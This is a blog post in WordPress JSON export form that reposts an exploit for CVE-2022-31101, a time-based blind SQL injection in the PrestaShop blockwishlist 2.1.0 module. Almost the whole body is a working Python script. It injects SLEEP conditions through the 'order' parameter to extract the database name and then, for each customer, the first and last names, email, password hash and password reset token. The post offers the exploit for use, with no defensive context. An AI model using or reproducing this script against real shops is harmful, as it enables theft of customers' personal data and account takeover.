{"id":29059,"date":"2022-08-09T20:58:13","date_gmt":"2022-08-09T16:58:13","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/168003\/prestashopbwl210-sql.txt"},"modified":"2022-08-10T08:08:38","modified_gmt":"2022-08-10T03:38:38","slug":"prestashop-blockwishlist-2-1-0-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/prestashop-blockwishlist-2-1-0-sql-injection\/","title":{"rendered":"Prestashop Blockwishlist 2.1.0 SQL Injection"},"content":{"rendered":"

# Exploit Title: Prestashop blockwishlist module 2.1.0 – SQLi
\n# Date: 29\/07\/22
\n# Exploit Author: Karthik UJ (@5up3r541y4n)
\n# Vendor Homepage: https:\/\/www.prestashop.com\/en
\n# Software Link (blockwishlist): https:\/\/github.com\/PrestaShop\/blockwishlist\/releases\/tag\/v2.1.0
\n# Software Link (prestashop): https:\/\/hub.docker.com\/r\/prestashop\/prestashop\/
\n# Version (blockwishlist): 2.1.0
\n# Version (prestashop): 1.7.8.1
\n# Tested on: Linux
\n# CVE: CVE-2022-31101<\/p>\n

# This exploit assumes that the website uses ‘ps_’ as prefix for the table names since it is the default prefix given by PrestaShop<\/p>\n

import requests<\/p>\n

url = input(“Enter the url of wishlist’s endpoint (http:\/\/website.com\/module\/blockwishlist\/view?id_wishlist=1): “) # Example: http:\/\/website.com\/module\/blockwishlist\/view?id_wishlist=1
\ncookie = input(“Enter cookie value:\\n”)<\/p>\n

header = {
\n“Cookie”: cookie
\n}<\/p>\n

# Define static stuff
\nparam = “&order=”
\nstaticStart = “p.name, (select case when (”
\nstaticEnd = “) then (SELECT SLEEP(7)) else 1 end); — .asc”
\ncharset = ‘abcdefghijklmnopqrstuvwxyz1234567890_-@!#$%&\\’*+\/=?^`{|}~’
\ncharset = list(charset)
\nemailCharset = ‘abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_-@!#$%&\\’*+\/=?^`{|}~.’
\nemailCharset = list(emailCharset)<\/p>\n

# Query current database name length
\nprint(“\\nFinding db name’s length:”)
\nfor length in range(1, 65):
\ncondition = “LENGTH(database())=” + str(length)
\nfullUrl = url + param + staticStart + condition + staticEnd<\/p>\n

try:
\nreq = requests.get(fullUrl, headers=header, timeout=8)
\nexcept requests.exceptions.Timeout:
\ndbLength=length
\nprint(“Length: “, length, end=”)
\nprint(“\\n”)
\nbreak<\/p>\n

print(“Enumerating current database name:”)
\ndatabaseName = ”
\nfor i in range(1, dbLength+1):
\nfor char in charset:
\ncondition = “(SUBSTRING(database(),” + str(i) + “,1)='” + char + “‘)”
\nfullUrl = url + param + staticStart + condition + staticEnd<\/p>\n

try:
\nreq = requests.get(fullUrl, headers=header, timeout=8)
\nexcept requests.exceptions.Timeout:
\nprint(char, end=”)
\ndatabaseName += char
\nbreak
\nprint()<\/p>\n

# Enumerate any table
\nprefix = “ps_”
\ntableName = prefix + “customer”
\nstaticStart = “p.name, (select case when (”
\nstaticEnd1 = “) then (SELECT SLEEP(7)) else 1 end from ” + tableName + ” where id_customer=”
\nstaticEnd2 = “); — .asc”<\/p>\n

print(“\\nEnumerating ” + tableName + ” table”)<\/p>\n

for id in range(1, 10):<\/p>\n

condition = “id_customer=” + str(id)
\nfullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2<\/p>\n

try:
\nreq = requests.get(fullUrl, headers=header, timeout=8)
\nprint(“\\nOnly ” + str(id – 1) + ” records found. Exiting…”)
\nbreak
\nexcept requests.exceptions.Timeout:
\npass<\/p>\n

print(“\\nid = ” + str(id))<\/p>\n

# Finding firstname length
\nfor length in range(0, 100):
\ncondition = “LENGTH(firstname)=” + str(length)
\nfullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2<\/p>\n

try:
\nreq = requests.get(fullUrl, headers=header, timeout=8)
\nexcept requests.exceptions.Timeout:
\nfirstnameLength=length
\nprint(“Firstname length: “, length, end=”)
\nprint()
\nbreak<\/p>\n

# Enumerate firstname
\nfirstname = ”
\nprint(“Firstname: “, end=”)
\nfor i in range(1, length+1):
\nfor char in charset:
\ncondition = “SUBSTRING(firstname,” + str(i) + “,1)='” + char + “‘”
\nfullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2<\/p>\n

try:
\nreq = requests.get(fullUrl, headers=header, timeout=8)
\nexcept requests.exceptions.Timeout:
\nprint(char, end=”)
\nfirstname += char
\nbreak
\nprint()<\/p>\n

# Finding lastname length
\nfor length in range(1, 100):
\ncondition = “LENGTH(lastname)=” + str(length)
\nfullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2<\/p>\n

try:
\nreq = requests.get(fullUrl, headers=header, timeout=8)
\nexcept requests.exceptions.Timeout:
\nlastnameLength=length
\nprint(“Lastname length: “, length, end=”)
\nprint()
\nbreak<\/p>\n

# Enumerate lastname
\nlastname = ”
\nprint(“Lastname: “, end=”)
\nfor i in range(1, length+1):
\nfor char in charset:
\ncondition = “SUBSTRING(lastname,” + str(i) + “,1)='” + char + “‘”
\nfullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2<\/p>\n

try:
\nreq = requests.get(fullUrl, headers=header, timeout=8)
\nexcept requests.exceptions.Timeout:
\nprint(char, end=”)
\nfirstname += char
\nbreak
\nprint()<\/p>\n

# Finding email length
\nfor length in range(1, 320):
\ncondition = “LENGTH(email)=” + str(length)
\nfullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2<\/p>\n

try:
\nreq = requests.get(fullUrl, headers=header, timeout=8)
\nexcept requests.exceptions.Timeout:
\nemailLength=length
\nprint(“Email length: “, length, end=”)
\nprint()
\nbreak<\/p>\n

# Enumerate email
\nemail = ”
\nprint(“Email: “, end=”)
\nfor i in range(1, length+1):
\nfor char in emailCharset:
\ncondition = “SUBSTRING(email,” + str(i) + “,1)= BINARY ‘” + char + “‘”
\nfullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2<\/p>\n

try:
\nreq = requests.get(fullUrl, headers=header, timeout=8)
\nif req.status_code == 500 and char == ‘.’:
\nprint(char, end=”)
\nemail += char
\nexcept requests.exceptions.Timeout:
\nprint(char, end=”)
\nemail += char
\nbreak
\nprint()<\/p>\n

# Finding password hash length
\nfor length in range(1, 500):
\ncondition = “LENGTH(passwd)=” + str(length)
\nfullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2<\/p>\n

try:
\nreq = requests.get(fullUrl, headers=header, timeout=8)
\nexcept requests.exceptions.Timeout:
\npasswordHashLength=length
\nprint(“Password hash length: “, length, end=”)
\nprint()
\nbreak<\/p>\n

# Enumerate password hash
\npasswordHash = ”
\nprint(“Password hash: “, end=”)
\nfor i in range(1, length+1):
\nfor char in emailCharset:
\ncondition = “SUBSTRING(passwd,” + str(i) + “,1)= BINARY ‘” + char + “‘”
\nfullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2<\/p>\n

try:
\nreq = requests.get(fullUrl, headers=header, timeout=8)
\nif req.status_code == 500 and char == ‘.’:
\nprint(char, end=”)
\npasswordHash += char
\nexcept requests.exceptions.Timeout:
\nprint(char, end=”)
\npasswordHash += char
\nbreak
\nprint()<\/p>\n

# Finding password reset token length
\nfor length in range(0, 500):
\ncondition = “LENGTH(reset_password_token)=” + str(length)
\nfullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2<\/p>\n

try:
\nreq = requests.get(fullUrl, headers=header, timeout=8)
\nexcept requests.exceptions.Timeout:
\npasswordResetTokenLength=length
\nprint(“Password reset token length: “, length, end=”)
\nprint()
\nbreak<\/p>\n

# Enumerate password reset token
\npasswordResetToken = ”
\nprint(“Password reset token: “, end=”)
\nfor i in range(1, length+1):
\nfor char in emailCharset:
\ncondition = “SUBSTRING(reset_password_token,” + str(i) + “,1)= BINARY ‘” + char + “‘”
\nfullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2<\/p>\n

try:
\nreq = requests.get(fullUrl, headers=header, timeout=8)
\nif req.status_code == 500 and char == ‘.’:
\nprint(char, end=”)
\npasswordResetToken += char
\nexcept requests.exceptions.Timeout:
\nprint(char, end=”)
\npasswordResetToken += char
\nbreak
\nprint()<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: Prestashop blockwishlist module 2.1.0 – SQLi # Date: 29\/07\/22 # Exploit Author: Karthik UJ (@5up3r541y4n) # Vendor Homepage: https:\/\/www.prestashop.com\/en # Software Link (blockwishlist): https:\/\/github.com\/PrestaShop\/blockwishlist\/releases\/tag\/v2.1.0 # Software Link (prestashop): https:\/\/hub.docker.com\/r\/prestashop\/prestashop\/ # Version (blockwishlist): 2.1.0 # Version (prestashop): 1.7.8.1 # Tested on: Linux # CVE: CVE-2022-31101 # This exploit assumes that the website uses …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-29059","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/29059","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=29059"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/29059\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=29059"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=29059"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=29059"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}